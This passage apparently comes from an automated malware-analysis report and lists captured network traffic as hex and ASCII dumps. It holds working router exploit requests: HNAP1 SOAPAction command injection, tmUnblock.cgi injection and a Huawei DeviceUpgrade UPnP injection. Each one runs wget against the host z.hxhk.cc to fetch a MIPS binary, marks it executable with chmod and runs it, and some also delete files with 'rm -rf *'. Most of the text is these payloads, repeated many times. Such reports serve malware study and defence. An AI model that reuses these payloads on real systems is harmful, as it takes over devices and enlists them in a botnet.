72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l 